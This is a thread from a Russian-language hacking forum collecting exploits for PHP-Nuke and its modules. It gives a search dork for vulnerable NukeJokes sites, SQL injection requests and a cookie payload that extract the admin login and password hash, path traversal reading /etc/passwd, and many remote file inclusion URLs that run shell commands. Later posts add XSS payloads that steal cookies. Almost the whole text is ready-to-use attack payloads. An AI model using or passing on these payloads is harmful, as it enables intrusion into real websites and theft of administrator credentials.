    Уязвимый продукт: PHP-NUKE module NukeJokes
    Версия: 2.2
    Дорк: inurl:modules.php?name=NukeJokes

    SQL-injections

    Уязвимость в файле: index.php
    PHP:
    function CatView($cat$page){
    ...
       
    $result sql_query("SELECT jokecid, catname FROM ".$prefix."_jokes_categories WHERE jokecid='$cat'"$dbi);
    Данные из параметра cat попадают в запрос без каких либо преобразований
    Пример запроса:
    Code:
    /modules.php?name=NukeJokes&func=CatView&cat=-7'%0aunion+select+1,2%23
    PHP:
    function JokeView($jokeid){
    ...
       
    $result sql_query("SELECT author, name, date, cat, joke, hits, ratingtot, ratings FROM ".$prefix."_jokes WHERE jokeid='$jokeid'"$dbi);
    Данные из параметра jokeid попадают в запрос без каких либо преобразований
    Пример запроса:
    Code:
    /modules.php?name=NukeJokes&func=JokeView&jokeid=-1'%0aunion+select+1,2,3,4,5,6,7,8%23
    Уязвимость в файле: send.php
    PHP:
     function send($jokeid$sendername$senderemail$toname$toemail){
        global 
    $sitename$nukeurl$prefix$dbi$module_name$stop;
        include(
    "header.php");
        include(
    "config.php");
        
    checkemail($toemail);
        if (!
    $stop) {
        
    $result sql_query("SELECT name from ".$prefix."_jokes where jokeid='$jokeid'"$dbi);
        list(
    $name) = sql_fetch_row($result$dbi);
        
    $subject ""._SUBJECT.$sitename";
        
    $message ""._HELLO.$toname:\n\n"._YOURFRIEND.$sendername "._CONSIDERED."\n\n\n$name\n\n"._URL.": $nukeurl/modules.php?name=$module_name&func=JokeView&jokeid=$jokeid\n\n"._YOUCANREAD.$sitename\n$nukeurl";
        
    $toemail str_replace(" ","",$toemail);
           
    mail($toemail$subject$message"From: \"$sendername\" <$senderemail>\nX-Mailer: PHP/" phpversion());
    Уязвимость в параметре jokeid, т.к данные из столбца name отправляются на email, при таком запросе:
    Code:
    POST /modules.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127
    Keep-Alive: 300
    Connection: keep-alive
    Referer: http://localhost/modules.php?name=NukeJokes&file=send&jokeid=1608
    Cookie: TRACKID=7b45bd0b2a560da542a5eb4fc22512c6; lang=english
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 181
    name=NukeJokes&file=send&func=send&jokeid=-1'/**/union select concat(aid,0x3a,pwd) from nuke_authors limit 0,1/*&sendername=aaa&senderemail=aaa%40mail.ru&toname=bbb&toemail=aaa%40mail.ru
    Мы получим aid:hash администратора на указаное нами мыло

    Уязвимость в файле: search.php
    PHP:
    function search($q$cat){
     global 
    $module_name$prefix$bgcolor1$bgcolor2$dbi$prefix;
    include(
    "header.php");
    if(
    $cat==0){
    $cats " ";
    }else{
    $cats " cat=".$cat." AND ";
    }

    ModuleSearch();
    ...
      
    $search sql_query("SELECT jokeid, author, date, name, cat, hits, ratings FROM ".$prefix."_jokes WHERE".$cats."(name LIKE '%$q%' OR joke LIKE '%$q%')"$dbi);
    Уязвимость в параметрах cat и q
    Пример запроса:
    Code:
    /modules.php?name=NukeJokes&file=search&func=search&q=x&cat=7%0aunion+select+1,2,3,4,5,6,7%23
    
    Уязвимость в файле: comments.php
    PHP:
    function JokesAddCom($jokeid$author$comment){
       global 
    $prefix$dbi$bgcolor1$module_name$bgcolor2;
        
    $author FixQuotes(nl2br(filter_text($author)));
        
    $comment FixQuotes(nl2br(filter_text($comment)));
       
    sql_query("INSERT into ".$prefix."_jokes_comments VALUES(NULL, '$author' ,'$comment' , '$jokeid')"$dbi);
    в ф-ции, filter_text удаляются хтмл тэги, затем данные попадают в ф-цию FixQuotes
    PHP:
    function FixQuotes ($what "") {
        while (
    stristr($what"\\\\'")) {
            
    $what str_replace("\\\\'","'",$what);
        }
        return 
    $what;
    }
    Для чего здесь была использована эта ф-ция непонятно, при magic_quotes_gpc=off мы без труда можем внедрить наш sql код, для этого
    выбираем любую шутку, жмем добавить комментарий, в куки кидаем:
    Code:
    author=aa',(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1),Существующий_ID)/*
    в результате получим aid:hash админа
     
  18. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    В модулях:

    Code:
    http://site/modules.php?name=Search&type=comments&query=not123 exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
    http://www.strona.pl/modules.php?name=Search&file=../../../../../../ ../../../etc/passwd%008

    Code:
    http://site/modules.php?name=Search&file=../Forums/viewtopic&phpEx=../../../../../../etc/passwd

    Code:
    http://site/modules.php?name=Private_Messages&file=index&folde r=inbox&mode=read&p=1&user=eDpmb28nIFVOSU9OIFNFTEV DVCAyLG51bGwsMSwxLG51bGwvKjox

    Code:
    http://site/modules.php?name=Web_Links&l_op=viewlink&cid=2%20U NION%20select%20counter,%20pwd,%20aid%20FROM%20nuk e_authors%20--
    Code:
    http://site/modules.php?name=Reviews&rop=savecomment&id=1&amp; amp;uname=f00bar&score=999999999999999999999999

    Code:
    http://site/modules.php?name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%2 0nuke_authors%20--

    Code:
    http://site/modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*
    

    В галерии:


    Code:
    http://site/modules/My_eGallery/public/displayCategory.php?basepath=yourshell.txt?&cmd=un ame -a;id;pwd
    Code:
    
    http://site/modules/4nAlbum/public/displayCategory.php?basepath=yourshell.txt?&cmd=un ame -a;id;pwd

    Code:
    http://site/modules/coppermine/upload.php?basepath=yourshell.txt?&cmd=uname%20-a;id;pwd
    
    Code:
    http://site/modules/coppermine/themes/default/theme.php?THEME_DIR=yourshell.txt?&cmd=uname -a;id;pwd

    Code:
    http://site/modules/coppermine/include/init.inc.php?CPG_M_DIR=yourshell.txt?&cmd=uname -a;id;pwd

    Code:
    http://site/modules/coppermine/themes/maze/theme.php?THEME_DIR=yourshell.txt?&cmd=uname -a;id;pwd

    Code:
    http://site/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=yourshell.txt?&cmd=uname -a;id;pwd

    Code:
    http://site/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=yourshell.txt?&c md=uname%20-a;id 
     
    #38 OptimaPrime, 3 Jan 2009
    Last edited: 3 Jan 2009
  19. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    Инклуды:

    Code:
    http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=shell?
    http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=shell?
    http://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=shell?
    http://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=shell?
    http://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=shell?
    http://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=shell?
    http://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=shell?
    http://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=shell?
    http://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=shell?
    http://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=shell?
    http://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=shell?
    http://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=shell?
    http://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=shell?
    http://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=shell?
    http://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=shell?
    http://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=shell?
    http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=shell?
    http://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=shell?
    
     
    1 person likes this.
  20. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    XSS

    Версии:
    Code:
    PHP-Nuke 7.3
     PHP-Nuke 7.2
     PHP-Nuke 7.1
     PHP-Nuke 7.0 FINAL
     PHP-Nuke 7.0
     PHP-Nuke 6.9
     PHP-Nuke 6.7
     PHP-Nuke 6.6
     PHP-Nuke 6.5 RC3
     PHP-Nuke 6.5 RC2
     PHP-Nuke 6.5 RC1
     PHP-Nuke 6.5 FINAL
     PHP-Nuke 6.5 BETA 1
     PHP-Nuke 6.5
     PHP-Nuke 6.0

    Code:
    http://www.example.com/modules.php?name=News&file=article&sid=1&optionbox=[xsscode here]
    http://www.example.com/modules.php?name=Statistics&op=DailyStats&year=2004&month=5&date=[xss
    code here]
    http://www.example.com/modules.php?name=Stories_Archive&sa=show_month&year=[xss
    code here]&month=05&month_l=May
    http://www.example.com/modules.php?name=Stories_Archive&sa=show_month&year=2004&month=[xss
    code here]&month_l=May
    http://www.example.com/modules.php?name=Stories_Archive&sa=show_month&year=2004&month=05&month_l=[xss
    code here]
    http://www.example.com/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=[xss
    code here]&order=0&thold=0
    http://www.example.com/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=[xss
    code here]&thold=0
    http://www.example.com/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=[xss
    code here]
    http://www.example.com/index.php?foo=bar%20union%20select%20<script>alert(document.cookie);</script>
     
Loading...